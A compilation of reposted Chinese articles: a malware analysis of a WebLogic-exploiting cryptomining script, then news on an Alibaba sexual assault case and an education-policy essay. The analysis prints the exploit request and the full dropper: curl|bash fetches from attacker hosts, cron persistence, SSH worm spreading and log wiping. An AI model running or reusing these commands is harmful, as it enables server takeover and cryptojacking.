


转自:https://mp.weixin.qq.com/s/3Rxq7qoQgz0nvVfbxYRY3w
分享个人经验,保留阅读记录,做时间的朋友



转自:https://mp.weixin.qq.com/s/3Rxq7qoQgz0nvVfbxYRY3w
温馨提示:本文中出现的命令和脚本,不要在自家服务器上随便运行,除非你知道自己在做什么。
挖矿是把机器当作奴隶,一刻不停歇的去计算、运转,本质上是个无用的工作。但可惜的是,它能赚钱。用别人的机器去赚钱,更是很多人梦寐以求的,所以挖矿脚本屡禁不止。
有钱的地方,就有技术。但反过来并不一定成立。
牢记这个准则,就能够心平气和的学习新技术,而不是气急败坏的纠结为啥没钱。
下面是一个http的报文。
GET /console/images/%2E%2E%2Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec(new String[]{'/bin/sh','-c','export src=logic;curl -fsSL t.bb3u9.com/ln/core.png?logic|bash'});"); HTTP/1.1
Host: 20*.10*.8*.1*9:7001 #已脱敏
User-Agent: curl/7.55.1
Accept: */*
Content-Type:application/x-www-form-urlencoded; charset=utf-8
很简单,waf防火墙拦截到相关包,一眼看上去就不正常。从关键字com.tangosol.coherence.mvel2.sh.ShellSession可以得知,这个请求,是想要利用Weblogic的远程代码执行漏洞。
这样的漏洞有很多很多,数不胜数,比如它可以通过redis进入。我们不必关注这些漏洞,默认它已经利用成功了。我们只看挖矿脚本是怎么部署到你的机器上的。
在java中,当然要调用它的Runtime类库,如果你的应用程序是运行在root用户的,那它什么事情都能干。
这就是为什么要求你线上部署的应用,都用权限低一点的账户,比如xjjdog去运行,而不是不要命的把root账户给开放。
exec函数带了三个参数。
/bin/sh 意味着它要执行一个shell脚本-c 指明了要执行的命令狡猾的人都喜欢带面具,而狡猾的脚本都喜欢改后缀。看起来是个png,但它是个脚本。
接下来摘下它的伪装,看一下它的真面目。
curl http://t.bb3u9.com/ln/core.png?logic > core.png
查看core.png文件中的内容。不错,很长一段脚本。
#/bin/bash
setenforce 0 2>/dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
murl1="http://t.bb3u9.com/ln/a.asp"
murl2="http://t.jdjdcjq.top/ln/a.asp"
cdate=$(date "+%Y%m%d")
guid=`echo $(sudo dmidecode -t 4 | grep ID | sed 's/.*ID://;s/ //g') $(ifconfig | grep -oP 'HWaddr K.*'|sed 's/://g')|sha256sum|awk '{print $1}'`
cmd1="export gurl=$murl1?${src}_${cdate};(curl -fsSL $gurl*`whoami`*`hostname`*${guid}||wget -q -O- $gurl*`whoami`*`hostname`*${guid})|bash"
cmd2="export gurl=$murl2?${src}_${cdate};(curl -fsSL $gurl*`whoami`*`hostname`*${guid}||wget -q -O- $gurl*`whoami`*`hostname`*${guid})|bash"
echo "">/var/spool/cron/root
echo "">/var/spool/cron/crontabs/root
if [ "`whoami`" == "root" ];then
cronpath=/etc/crontab
Xpath=/.Xl1
else
cronpath=/var/spool/cron/`whoami`
Xpath=~/.Xl1
fi
if [ ! -d "$Xpath" ];then
mkdir $Xpath
echo "$[$RANDOM%60] * * * * root $cmd1" >> $cronpath
echo "$[$RANDOM%60] * * * * root $cmd2" >> $cronpath
uname -a|grep x86_64 && echo "$[$RANDOM%60] * * * * root ps aux|grep p.b69kq.com |grep -v grep || $Xpath -o p.b69kq.com:444 --opencl --donate-level=1 --nicehash -B --http-host=0.0.0.0 --http-port=65529 --opencl --cuda" >> /etc/crontab
export gurl=$murl1?${src}_${cdate};(curl -fsSL $gurl*`whoami`*`hostname`*${guid}||wget -q -O- $gurl*`whoami`*`hostname`*${guid})|bash
export gurl=$murl2?${src}_${cdate};(curl -fsSL $gurl*`whoami`*`hostname`*${guid}||wget -q -O- $gurl*`whoami`*`hostname`*${guid})|bash
fi
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
按照常规,我们来一行行拆解它。
1)关掉selinux。setenforce 0是关闭的意思,2表示stderr,出错了不提示。接下来会通过写配置文件的方式,永久性的禁止selinux。
setenforce 0 2>/dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
2)很良心的帮助清理一下系统内存
sync && echo 3 >/proc/sys/vm/drop_caches
3)构造guid,对机器进行标识
guid=`echo $(sudo dmidecode -t 4 | grep ID | sed 's/.*ID://;s/ //g') $(ifconfig | grep -oP 'HWaddr K.*'|sed 's/://g')|sha256sum|awk '{print $1}'`
dmidecode命令,可以获取linux硬件相关的信息,会输出非常多的内容。-t 4表示只获取Process方面的内容。然后过滤一下ID信息,使用sed命令截取并去掉空格。
ID: 57 06 05 00 FF FB 8B 0F
会变成。
57060500FFFB8B0F
然后使用ifcongig命令获取网卡硬件MAC信息。做同样的处理后获得另外一个串。这段脚本写的稍微有点问题,因为ifconfig的输出经常会改格式,但不影响计算hash。
sha256sum就是算出这样一个hash,然后赋值给guid。比如下面这个。
786e5dcff31795d7b6b24cdf4f114867f423315de9bd4a879b57478ad99e2c5c
4)安装定时任务到crontab中
脚本选择了/.Xl1目录作为真正的挖矿程序的存储目录。注意这三个字母,后面是l和1,并不是X桌面的配置目录。在真正的脚本部分,我们可以看到下载的程序包地址是d.u78wjdu.com/ln/xr.zip。
5)我们再来看一下下载的链接是什么样子的
cmd1="export gurl=$murl1?${src}_${cdate};(curl -fsSL $gurl*`whoami`*`hostname`*${guid}||wget -q -O- $gurl*`whoami`*`hostname`*${guid})|bash"
cmd2="export gurl=$murl2?${src}_${cdate};(curl -fsSL $gurl*`whoami`*`hostname`*${guid}||wget -q -O- $gurl*`whoami`*`hostname`*${guid})|bash"
其中,src变量是在一开始就设置的,我们依次来还原一下。
export src=logic
cdate=$(date "+%Y%m%d")
guid=`echo $(sudo dmidecode -t 4 | grep ID | sed 's/.*ID://;s/ //g') $(ifconfig | grep -oP 'HWaddr K.*'|sed 's/://g')|sha256sum|awk '{print $1}'`
gurl=$murl1?${src}_${cdate}
最终会拼成下面的字符串,可以说该有的信息都有了,能够区分出到底是哪一台机器了。
url?_20210722*root*host_iZ2ze5w0d1f4lplj3yuflcZ*786e5dcff31795d7b6b24cdf4f114867f423315de9bd4a879b57478ad99e2c5c
$RANDOM环境变量,是个神奇的环境变量。直接输出的话,将会得到一个随机值。cron脚本周期性的拉取最新的脚本执行,把真正的挖矿程序部署起来。
关于真实脚本的介绍,xjjdog在另外一篇文章中有详细的介绍。在这个场景下,最新的脚本就是http://t.bb3u9.com/ln/a.asp,依然是改后缀的障眼法。
这个脚本显然比上面这篇文章介绍的要更加高级一些。脚本很长很长,就不贴了,你可以自己下载。它的主要意图,是下载一个叫做xr的程序,然后在马甲目录.Xl1中运行。xr程序才是挖矿的主要程序,其他的脚本,都是辅助它来运行的。下面是最主要的运行逻辑。
if [ ! -d "$Xpath" ];then
mkdir $Xpath
fi
cd $Xpath
if [ ! -f "./xr" ];then
uname -a|grep x86_64 && (curl -fsSL d.u78wjdu.com/ln/xr.zip||wget -q -O- d.u78wjdu.com/ln/xr.zip)>xr.zip && tar xf xr.zip && rm xr.zip
fi
uname -a|grep x86_64 && ps aux|grep p.b69kq.com |grep -v grep || ./xr -o p.b69kq.com:444 --opencl --donate-level=1 --nicehash -B --http-host=0.0.0.0 --http-port=65529 --opencl --cuda
要保证脚本的安全,怎么能少得了chattr命令。很多人遇见加了i参数的文件,不能被删除,就傻眼了。其实是可以通过-i参数去掉这个属性的。
chattr -iua /tmp/
chattr -iua /var/tmp/
chattr -R -i /var/spool/cron
chattr -i /etc/crontab
脚本还会通过nc命令,拷贝rsa公钥到你的每个用户目录下面,把你做成事实上的肉鸡,实现免密登录。关于nc这把瑞士军刀,我们也有过介绍。
for file in /home/*
do
if test -d $file; then
if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "b([0-9]{1,3}.){3}[0-9]{1,3}b" $file/.ssh/known_hosts); do echo exit |nc -w 1 -n -v $h 65529 && ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'export src=sshcopy;(curl -fsSL http://t.bb3u9.com/ln/core.png?sshcopy*`whoami`*`hostname`||wget -q -O- http://t.bb3u9.com/ln/core.png?sshcopy*`whoami`*`hostname`)|bash >/dev/null 2>&1 &' & done
fi
fi
done
这份脚本,还会病毒式的传播。localgo函数,通过从你的ps进程,history文件,还有hosts配置,拿到用户列表、主机列表端口、rsa密钥等,就可以批量的去尝试登录并传播这份脚本。当然,上面的xr程序会监听65529的端口,如果判断主机已经中招了,就不再继续探测。
能用65529这个端口,本身就够骚气的了,有几台机器能够达到上限65535呢?
localgo() {
i=0
for user in $userlist; do
for host in $hostlist; do
for key in $keylist; do
for sshp in $sshports; do
i=$((i+1))
if [ "${i}" -eq "20" ]; then
sleep 20
ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
i=0
fi
#Wait 20 seconds after every 20 attempts and clean up hanging processes
chmod +r $key
chmod 400 $key
echo "$user@$host $key $sshp"
echo exit |nc -w 1 -n -v $host 65529 && ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "export src=sshcopy;(curl -fsSL http://t.bb3u9.com/ln/core.png?sshcopy*`whoami`*`hostname`||wget -q -O- http://t.bb3u9.com/ln/core.png?sshcopy*`whoami`*`hostname`)|bash >/dev/null 2>&1 &"
done
done
done
done
}
最后,脚本还不忘汇报一下,形成完美的闭环。
reurl=http://t.bb3u9.com/ln/report.asp?*`whoami`*`hostname`*${guid}*${isdocker}*${pyver}*${isxrfile}*${hashrate}*${mip}
(curl -fsSL $reurl||wget -q -O- $reurl)|bash
如果你发现你的机器不明原因发热,务必排查一下有没有挖矿程序。虽然你的服务器摆在那里也没什么用,但用着你的电费,收益却给别人,相信你一定会嫉妒的要命。那么别犹豫,kill -9送给它,别忘了清理cron。
重装是我们的秘密武器,仅次于重启。嫌麻烦的话,就这么干吧!
转自:https://mp.weixin.qq.com/s/oo5z7XqPBp9ZdNx8qsYkaA
转载自公众号:21世纪经济报道(ID:jjbd21)
阿里女员工在济南出差期间被侵犯一事仍在发酵。
今日凌晨,阿里巴巴董事会主席兼CEO张勇在阿里内网公布了“女员工被侵犯”的阶段性内部调查结果和处理决定:
同城零售事业群总裁李永和和HRG徐昆引咎辞职;
阿里巴巴首席人力资源官童文红记过处分;
涉嫌男员工被辞退,永不录用,其是否存在违法行为,警方正在调查取证。

“半夜里,内网上仍然文字汹涌。大家对事件的高度关注,不仅是对受到伤害的同学的同情和关爱,更是对背后折射出阿里文化问题的痛心疾首。”张勇表示,事件对这位女员工造成了巨大的伤害,无论警方的调查结果如何,“我们会尽全力关心和照顾好她。”
涉嫌男员工和女同事在酒醉状态下有过度亲密行为,严重违反公司规定,予以辞退,永不录用。关于他是否有强奸或者猥亵等违法行为,警方正在调查取证。
同城零售事业群总裁李永和(老鼎)和同城零售事业群HRG徐昆(丁冬)引咎辞职。内部公告认为,李永和作为事业群总裁,在这件事上的敏感性、重视和投入程度远远不够,没有主动作为,徐昆也没有起到事业群HRG关键决策的作用,为此应承担领导责任。
阿里巴巴集团首席人力资源官童文红受到记过处分。在整个事件处理过程中,HR团队对人的关注、关怀不够,理性多了,感性少了,缺乏感同身受。同时,缺乏应急响应体系和存在严重的判断失误,在涉嫌违法的情况下,未能第一时间将当事人停职。“这种种现象的背后是HR文化体系和能力的建设出现了重大问题。”
张勇表示,阿里是所有阿里人的阿里,之所以痛,是因为爱,发生这样的事情是全体阿里人的屈辱。“我们必须重塑,我们必须改变。改变必须从每个人做起,但是首先必须从领导者做起,从我做起。请大家拭目以待。”
这份内部公告中,阿里提到,接下来将继续在三个方面反思和行动:
1、开展对于包括性骚扰在内的员工权益保护的培训和调查,开通专门举报通道。员工的举报,将在确保隐私受到充分保护的前提下,由专人跟进。
2、对性骚扰零容忍,由外部专家和员工代表共同制定《反性骚扰行动准则》。
3、旗帜鲜明地反对丑陋的陪酒文化,不分性别,阿里巴巴无条件支持员工拒绝陪酒。
阿里超6000名员工联合倡议:建立职场反性骚扰制度,严查事件过程
昨日,一封名为《Aliren help Aliren,6000名阿里人关于807事件的联合倡议》在社交媒体中转发。前述倡议书中提到,阿里巴巴员工自发建立了一个讨论群,名为“勇敢牛牛帮助小组”,该小组称将借此事件,推动员工、特别是女性员工职场反性骚扰/反性侵制度的建立。
据澎湃新闻向阿里求证,前述联合倡议书内容属实。针对“807事件”,阿里巴巴建立了“勇敢牛牛帮助小组,在这个小组中,阿里巴巴员工为职场反性骚扰/反性侵制度的建立征集了很多意见。
这封署名为“勇敢牛牛员工帮助小组”的联合倡议中提到,自发聚集在一起的目标是通过对事件的持续关注,从而推动事件真相的彻查、为阿里组织生态的改变提供建议,并推动落地。目前该群组内加入的阿里员工已超过6000人,包括阿里各条线的工作人员。
该倡议希望公司正视当事人在内网提到的两点诉求,即开除嫌疑犯,永不录用;给予当事人带薪长假,(建议先给当事人3个月带薪假期,后续由专业心理机构评估是否需要延长),给予足够的心理恢复及支持。
倡议表示,为当事人及家属提供中长期优质免费的心理咨询服务及回访,直至受害人及家属确认走出阴影,不再需要此类支持。
倡议中提及,希望公开调查组成员、运作机制,并及时披露信息,严查事件过程,给当事人和员工一个交代,令涉事高管正面回应质疑,并作详细解释。此外,在女性员工职场反性骚扰制度、倡导HR不唯上更向人看、CPO与员工建立长期沟通机制等方面,这份倡议也提出了具体诉求。
倡议同时公布了目前小组的工作进度,公司正在筹备建立《员工反性骚扰/反性侵保护机制》,诚邀大家积极提出建议。

华联当事人:席间有搂抱,但没有猥亵
作为涉事商家,8月8日,济南华联超市发布声明称,就该事件华联超市会全力配合警方工作,涉嫌员工现已停职正在接受警方调查。华联超市对于任何违法犯罪行为始终保持零容忍的态度,目前超市已成立专门调查组对事件进行调查,也将密切关注警方调查进展和结果。
据武汉晨报,涉事员工张某告诉记者,目前他正在派出所接调查,对于阿里女员工周某的指控他认为不实,“那天吃饭只是普通饭局,我没有做过分动作。”其称,自己并没有摸过、亲过周某,说猥亵是诬陷,“我现在觉得自己比较冤屈,猥亵是诬陷,我相信警方会秉公执法,还我一个清白。”
另据新京报8月8日晚间消息,记者对话济南华联超市涉事员工张某。对此,张某予以否认,“在酒桌上正常喝酒,中间肯定有搂抱的过程”。女员工称,张某在她醉酒后扶她到其他包间长达20分钟,对此张某予以否认。目前,济南警方在调查取证。


南财快评:让女性以性为耻的文化,是施暴者最强大的帮凶
网曝阿里巴巴员工被上司性侵,据当事人称,内部处理过程中,当事人不仅被要求反复举证自证,同时也感受到各种社会压力,最终当事人只能以在公司场合公开举报。
震撼全网的,除了性侵事件本身,更多的是当事人维权过程遇到的漠视和困难。作为受害人,不论是在警方调查取证还是在企业内部处理过程中,通常都被被要求自己证明自己受到了伤害,个人隐私不断反复的暴露。就社会环境而言,对受害者而言是反复的痛苦。为了证明自己受到了侵害,需要把还在流血的伤口一遍遍的扒开来给调查组看,直到最后被迫向全网公开。难怪有网友感叹,到了数字时代,还有这种为了伸冤不得不滚钉板的小白菜呀。
但凡注意到中国社会对性议题的敏感度,就可以发现,不论是酒桌文化,还是企业各种迎新文化。在目前的社会环境里,似乎男人谈性是一种幽默,女人谈性就是女人的不是,哪怕是自己因性受害也不好拿出来大声宣讲,在文化上,多少会认为女人这样做不体面。女人谈性的社会空间,有着一本看不见的性别经济账。
所以一旦发生性侵害,受害女性为了伸冤需要付出更多的代价,男性施暴的成本极低,女性伸冤的成本极高,这本身就是一种在文化经济账面上的社会惩罚。我们可以相信,有多少受性侵的女人因为要顾及颜面和名声,不得不忍气吞声。以性来羞辱女性的文化,不啻为施暴者最强大的帮凶。
其实中国在法律保护方面是非常充分的,根据我国《刑法》对强奸罪的规定,以暴力、胁迫或者其他手段强奸妇女的,处三年以上十年以下有期徒刑,奸淫不满十四周岁的幼女的,以强奸论,从重处罚。
早在2005年,性骚扰也写进了《中华人民共和国妇女权益保障法》,该法规定,妇女受到侵害,有权向单位和有关机关投诉。2012年4月28日施行的《女职工劳动保护特别规定》第十一条规定:在劳动场所,用人单位应当预防和制止对女职工的性骚扰。同时,第十五条规定:用人单位违反本规定,侵害女职工合法权益,造成女职工损害的,依法给予赔偿;用人单位及其直接负责的主管人员和其他直接责任人员构成犯罪的,依法追究刑事责任。
其实警方在处理相关案件制定了相应的当事人保护办法。企业除了需要预防和制止对女职工实施性侵害,也应该在内部调查过程中制定当事人保护制度,避免在内部调查的过程中对女职工进行二次“性骚扰”。根据中国纺织工业联合会编制的《健全职场性骚扰防治机制企业指导手册》对职场性骚扰的定义指出,“发生在招聘或工作场所的、违背对方意愿的、具有性含义的、使求职者或员工处于某种不利地位或难以忍受的敌意环境中的侵权行为”均为职场性骚扰,所以,性骚扰在内部调查过程中不断被要求自曝隐私,本身就不是调查中所必须的!
2015年麦肯锡全球研究院发布《平等的力量:性别平等如何为全球经济创造12万亿美元的增长》的报告,该报告指出,全球范围内缩小职场的性别差距,能够促使妇女在2014-2025年间的全球GDP增长做出双倍的贡献,如果女性参与经济活动的机会与男性一致,那么有望在2025年全球GDP出现28万亿美元的增长,相当于美国与中国当时经济总量之和。麦肯锡将职场性别平等、关键服务与经济机会的驱动因素、法律保护和政治声音、人身安全与自主能力,作为判断性别平等的关键指标。保护职场女性人身安全已经不仅仅是企业社会责任任务和品牌商誉,更是企业的经济成败本身。
三孩时代,保障女性职场权益,不仅仅是延长带薪产假那么简单,给予女性充分的身体安全感、打破职场舆论环境中的男女双标,建构全流程性别友好的健康职场,才是重中之重。(作者任珏为特约作者)
来源丨21世纪经济报道综合自南财快评(作者 任珏)、环球网、澎湃新闻、武汉晨报、新京报等
转自:https://mp.weixin.qq.com/s/QW0dcOos-Vj505swPCs67w
8月7日,网传阿里一女员工被要求出差山东济南,在陪酒被灌醉后遭到猥亵。随后,直属领导为之开好房间,不过期间四进四出,当女员工醒来之后发现自己可能遭遇了强奸。
她在报警并看完监控后,在阿里内部向多位领导反映情况无果,遂前往食堂发传单,却被保安抢走,但消息不胫而走。

事件过去了10天,终于在网上发酵之后,阿里连夜对媒体回应称:决不容忍,全力配合警方,涉嫌员工已停职接受警方调查。
昨日凌晨,阿里巴巴董事长兼CEO逍遥子也发表声明称“震惊、气愤、羞愧”,其中透露的一个重要信息是,他也是昨晚才知道此事,并不比公众早。也就是说,这件事过了10天,根本就没到核心管理层那里,而是在中途就被拦下了。
事件发生后,大量阿里员工和前员工在社交媒体对此事表达了自己的不满,内部更是有数千人组建钉钉群支持受害女同事。
事实上,阿里与“低俗”、“性骚扰”这些词汇并非第一次产生联系,此前多次出现过类似指责。比如2018年5月,阿里就被指员工入职时被要求玩低俗的破冰游戏,回答涉及性方面的各种私密问题,这些问题尺度之大,包括“第一次是什么时候、自己喜欢什么体位”等,阿里巴巴官方很快对此进行了辟谣与否认。
另一方面,这家公司的创始人马云在2017年5月10日的阿里集体婚礼上说,爱是做出来的。
后马云时代,阿里在管理上面临的挑战变得更加艰巨,尤其是在月饼门事件和蒋凡事件发生后,公司价值观也开始受到越来越多的质疑。
值得一提的是,去年与今年曝出负面事件都处于业务转型节点上。
去年是天猫信息流大改版关键时间,内容视频化以应对拼多多和字节猛攻。作为淘宝直播的主要策划者蒋凡,因随后的负面新闻直接退居幕后。此外,悉心培育出的头部主播张大奕也随之走下神坛。
今年是阿里同城零售的破局之年,过去一年内控股高鑫零售(旗下有大润发与欧尚两大品牌)、苏宁,线下布局几近完成时,突然曝出淘鲜达女员工的负面新闻,实在流年不利。
最新进展
8月9日,阿里巴巴董事会主席兼CEO张勇在阿里内网公布了“女员工被侵犯”的阶段性内部调查结果和处理决定:同城零售事业群总裁李永和和HRG徐昆引咎辞职,阿里巴巴首席人力资源官童文红记过处分,涉嫌男员工被辞退,永不录用,其是否存在违法行为,警方正在调查取证。

去年2月,张勇在2020财年电话会议中表示,本地生活服务“不是一个业务,更多的是支持消费的基础”,为此后不断调整业务线埋下了伏笔。
6月组织架构大调整后,围绕同城零售形成了天猫超市+淘鲜达+盒马鲜生的业务组合,其中“淘鲜达”品牌承担了一大重任:盘活规模数十万的商超生态,形成一小时达,其重要性自不待言。
“建新城”与“拆旧城”是阿里新零售战略的两条主线,而淘鲜达属于“拆旧城”部分,即用数字化改造线下商超传统零售模式。因而,与阿里商超生态伙伴互动是该部门的常务之一。
刚刚过去的七月,阿里刚刚完成组织架构升级,重点在于调整本地生活业务,而淘鲜达即属于该业务线下。李永和(老鼎)担任本地生活公司CEO,原CEO王磊卸任另有任用。这次调整多被外界解读为应对美团的同城零售,不幸的是一个月后业务掌舵人老鼎受到此次负面事件波及。
根据以上时间线,不难发现,阿里本地服务刚刚完成新一轮整合,此时曝出负面新闻将严重打乱其同城零售布局节奏。
据受害人介绍,她曾层层向上反映情况,从而牵扯出诸多高层,具体包括:曲一的直属领导,淘鲜达LKA(地方性重点客户)负责人;淘鲜达BU负责人;同城BG负责人等,整个同城零售-淘鲜达业务线上的高管像蚂蚱一样被受害人串在了一起。
其中最受关注的是受害人的直属上级——“曲一”,这是王某花名。
光子星球了解到,曲一是淘鲜达华北区商家运营组负责人,在2014年8月到2016年5月,担任城市经理,负责饿了么南宁高校团队搭建和业务开展。结合履历与爆料信息,王某疑似拥有七年的商家与带队伍经验。
在2017年成立淘鲜达品牌后,阿里本地服务不断打通,随着业务开展,有知情人向光子星球表示,饿了么一度被美团压制,且带有外包色彩,一些员工看到集团成立淘鲜达,便转岗到新业务部去,王某可能便是其中一员。
8月的这起负面事件至少暴露了两个问题,一个是马云退休后,新六脉神剑之下,阿里的公司文化与治理受挫;另一个是事件波及的大多是To B业务骨干,在昔日中供铁军步入中年,离开阿里后,如何打造新生代“铁军”变得极为重要。

阿里巴巴的企业文化受马云影响颇深,而武侠与酒文化是两大重要元素,因之方才有如下对新阿里人的说法:一年香,三年醇,五年陈。
在特定历史时期,这套企业文化衍伸出的方法论一度让阿里迅速崛起。

根据经济观察报报道,2014年5月,在阿里巴巴宣布提交赴美上市招股书的三天后,马云从上海回到杭州,参加完集体婚礼和支付宝年会,他和公司几个高管就在自己家里喝茅台酒回忆往事。
马云当时回忆,自己一直念念不忘的是创业之初在一次与煤老板的饭局上,对方说如果马云能够一口气喝掉9杯白酒,他就会承诺投资马云50万元。马云很犹豫:“可是我根本不会喝白酒啊!”这时候他的秘书拿过酒杯,决定替老板挡下喝酒的要求,最后她喝了27杯。
阿里从最初发展业务不得不喝酒,到后面开始逐渐开始形成自己的酒文化,尤其在销售层面普遍存在。
陈放曾是中供铁军的一位骨干,他告诉光子星球,阿里的确有非常丰富的酒文化,例如众人皆知的PK文化,“每次开启动会就绑着红头绳,现场杀个鸡,喝血酒。”如今陈放即便人过中年,白酒还是按斤来喝的。
饮酒能放大人的情绪,陈放回忆说,自己曾经一度很不习惯绑红绳、喝红酒那套做法,几次PK时自己还忍不住笑场。可当自己带队伍时,他发现酒的确是个好东西,人的情绪会变得很柔软,又很亢奋,“我们去年9月团建的时候,晚上喝了场大酒,大家释放了情绪,团队迅速拧成了一股绳”。
不过他也坦诚,除了酒文化之外,当年中供铁军招人的指向性也是后来成功的一大因素。
“我是农村出来的,当时铁军特别喜欢招我们这种苦大仇深,又有上进心的年轻人。”这一点在公开信息中颇为常见。
早期骨干干嘉伟在乌镇做过搬运工,利用双轨制倒腾过钢材。1988年,他赚得盆满钵满,加之年少轻狂,喜欢与狐朋狗友到舞厅消遣,如果打烊还玩儿得不尽兴,阿干会从屁股兜里掏出一沓钱,拿出200元延长两个小时表演时间。
直到一年后一切归零,浪子方才回头。
“中供铁军团队其实既狼性,又比较土”,鲁斯曾是中供铁军的一位区域经理,他告诉光子星球,从外面看是铁军,很狼性,可自己进去之后第一个感觉是怎么这么土。随后他总结说:“阿里不是大家想当然的那么高大上,其实有非常草根的一面。”
到底是什么让这些渴望财富的年轻人变得有战斗力?外界大多认为是六脉神剑,其实直接原因来自于绩效制度与团队氛围。
阿里曾有一套设计精巧的制度,这套名为“金银铜牌制”的业绩算法,被许多老中供人称道。简言之,就是上个月你的业绩对应的提成决定了你下个月的佣金系数,从而避免了故意累积单子的瑕疵,还能不断激励他们连创新高。
现在阿里的To B销售人员能力上不输过去中供,陈放认为唯一差异是少了点“侠客精神”。比如看到同伴三个月开不出单子,会把自己的客户介绍给他。他总结道:过去中供铁军会一起住、一起吃饭,彼此间的情感与默契度很高。
一位中供铁军骨干俞朝翎的经历颇能印证这一说法,“白天跑客户大家分开,晚上其实很孤独。我们吃在一起,住在一起。你的短裤什么颜色,平时有哪些丑陋的习惯,我们都知道。”他也认为“好的说辞、灵感都是在吃饭、喝酒、睡觉的过程当中才会迸发出来”。
时至今日,阿里中供铁军已经淡出历史舞台,但是这个群体所留下的酒文化却在阿里扎根,并开始散布到很多其他公司。
比如出身于阿里销售体系的滴滴出行创始人程维,一直都很喜欢喝酒,在滴滴与快的合并之后,他经常约原快的打车CEO吕传伟在北京上地附近喝啤酒撸串。
程维和团队一起喝酒,就是释放压力、嬉笑怒骂。滴滴出行高级副总裁朱景士曾对《中国企业家》如此评价程维喝酒:“有些人喝酒是为了应酬,有些人喝酒那一刻是享受,他属于后者,我属于前者。”

在旧六脉神剑中,充满“利他”色彩,即便是996、狼性,终归还是有一套侠客精神兜底。而新六脉神剑显然更具现代性,但整体上开始往“利己”转向,譬如“此时此刻,非我莫属”。带来更高效的同时,我们也能看到阿里的企业文化已经不复往日。
|
旧六脉神剑 |
新六脉神剑 |
|
客户第一:客户是衣食父母 |
客户第一,员工第二,股东第三 |
|
团队合作:共享共担,平凡人做非凡事 |
团队合作:因为信任,所以简单 |
|
迎接变化,勇于创新 |
唯一不变的是变化 |
|
诚实正直,言行坦荡 |
今天最好的表现是是明天最低的要求 |
|
乐观向上,永不放弃 |
此时此刻,非我莫属 |
一位阿里巴巴员工告诉光子星球,此事传递出极为不好的价值观,女同事合法合规诉求得不到应有的重视和答复,再联想到月饼门事件,这背后是阿里价值观的双标。“普通员工做错了事,哪怕再小都要被严惩。但老板们做了明显越界甚至违法的事,却一次又一次被原谅和包庇。公司怎么做,大家都看在眼里,这样下去阿里的价值观还有谁会信呢?”
这件事真正可怕的地方在于,那些领导之所以一直袒护受害人的直属上级曲一,是因为这种事在他们眼中已经见怪不怪,或者说他们本身就是带来这种风气和职场环境的推动者。
一家创业公司前员工告诉光子星球,他所在公司的上级领导此前在阿里巴巴职级是P8,来到公司以后将以前的做法带到新团队,经常对女下属动手动脚,催进度时站在女同事后面直接搭人家肩上,摸对方头发,当时看女同事没有很大反应就没想太多。
“部门聚餐,稍微喝多之后就众目睽睽之下把手放女同事大腿上。之前总觉得是个例,后来离职以后再回想起来,就越想越恶心,这就是环境问题,如果我一直呆在那里,不知道会不会也变成这样?”上述人士说。
对于阿里而言,酒文化是成长过程中逐渐形成的,它既是过去成功的因素之一,也是未来制约公司走上更高舞台的重要因素,阿里别无选择必须摒弃。
但另一方面,在转向To C多年后,如今阿里正深入线下重回To B,这种销售导向型业务,又很难真正不碰酒桌。
至少在回归线下以后,机械性地套用过去中供铁军的方法论已经不太适用了。更亟待解决的问题是,如今这套偏向工具理性的企业文化频频爆雷,似乎表明“新六脉神剑”不如过去那么切中时代,束缚人性了。
此外,阿里女员工事件曝发于互联网线下化的浪潮中,巨头们动辄“改变传统”、“颠覆过去”、“赋能行业”,却连酒局应酬也无法抵御,实在有些难以自圆其说。像阿里、美团、字节等销售型公司,在不断灌输“八股文”之时,恐怕还得补一补人间烟火之课。
转自:https://mp.weixin.qq.com/s/Jlz1fAVjk1-L6FhQgtezuw
不同的认知自然带来不同的应对行为,而家长的应对短则影响孩子几年,长则影响一辈子,绝非小事。所以,在这次“双减”改革的重大十字路口前,能不能对整个事情全貌有整体而全面的认知就很重要了。
本文来源:珊爸超级爱学习(id:T-reading),
………………………………….
上星期,教育圈最大的话题还是“双减政策”,而且大家主要关心的就是双减政策中打击课外培训这一部分。
关于政策,家长们的意见明显分成两拨:一部分明确支持国家政策,庆幸能够让教育回归本源、让孩子和家长减轻一点负担;另一部分则是明确反对“一刀切”式的禁止,觉得自己非常需要培训班。
今天我想再跟大家闲聊下这个话题。因为话题具有一点敏感性,过去一个星期有很多同类文章已经被吃掉了,大家且看且珍惜。
为什么大力打击培训班
首先要强调一下,现在课外培训班并没有一棍子打死。按照40号文规定,义务教育阶段学科类可以继续上,只是规定在非寒暑假的周一到周五,还不能上得太晚。不过这一刀砍得也够深了,下面就当是全砍了来讨论吧。
开始之前,我先聊一下“剧场效应”。我相信关心教育的家长对这个概念不会陌生。“剧场效应”认为,一个剧院的人,如果第一排站起来,后面的人为了看剧,被迫一排一排地站起来,最后谁也没占到任何便宜,却多花了成本。
那人人都上课外培训班,到底是不是“剧场效应”呢?
大家再想想这么一种情况:
村子里两户人家,一户打猎,一户种菜。猎户每天打4只兔子,菜农每天收4斤菜,然后互相拿2只兔子换2斤菜,荤素搭配,皆大欢喜。结果有天猎户换了把新猎枪,现在每天可以打8只兔子,于是两户人一合计,每天拿4只兔子换3斤菜,现在猎户一天吃4只兔子3斤菜,菜农虽然少吃1斤菜但是多了2只兔子,也很开心。
我管这种效应叫“猎枪效应”,也就是说猎户换了新猎枪,不仅自己吃的多了,连带菜农也受益。
放在教育里,就是这样一种情况:我们俩上学,你用功读书,我不爱读书,但是你读书以后建设社会,国家富强,你固然赚了大钱,我生活也没变差,反而变好了。
课外培训到底是剧场效应,还是猎枪效应?唯一的评判标准就是,参加课外培训的孩子,到底只是抢占了其他人的蛋糕,还是把所有人的总蛋糕做大。简单来说,剧场效应里只会分配存量,而猎枪效应会创造增量。
